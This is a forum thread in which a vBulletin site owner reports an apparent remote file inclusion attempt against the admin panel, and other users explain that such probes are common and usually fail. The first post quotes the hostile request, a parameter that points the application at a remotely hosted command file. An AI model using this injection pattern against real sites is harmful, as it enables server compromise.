Announcement

Collapse
No announcement yet.

Possible hack attempt or random occurrence?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Possible hack attempt or random occurrence?

    Last night I was viewing who was online and I noticed a guest user in the admin control panel. Since I'm the only user that has access to the admin cp I knew that something wasn't right. I hovered over the question mark with my mouse to see what they were doing and it came up with this:

    /admincp/index.php?cfgProgDir=http://h1.******.com/barsel/cmd.txt??

    I'm currently running 3.6.8 patch level 2.

    I banned the IP address in the control panel, but I still wonder if this was this just something random or was it an attempt to actually get into the forum software and/or the server? Is it something I need to be worried about? I don't see any events in the log file other than my own so nothing was done that I'm aware of but I'm still concerned.

    Thoughts?

  • #2
    If you review your HTTP logs you will see you often get attempts like these on average about 10+ times a day or more depending on how popular your forum is.

    Most of the time they fail since they are usually trying to exploit remote file inclusion vulnerabilities in older versions of the software.

    As far as I know "cfgProgDir" isn't even used by vBulletin so you can be certain that one was a failure. Although you might want to wait for an official answer as to whether "cfgProgDir" is used by vBulletin.
    http://data.collectiveirc.net/status/user/Jobe.png

    Comment


    • #3
      the "cfgProgDir" doesn't work with vbulletin a simple google will show where its used as an exploit
      | http://foxpawhosting.com
      | http://darkaeongraphic.com
      |

      Comment

      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
      Working...
      X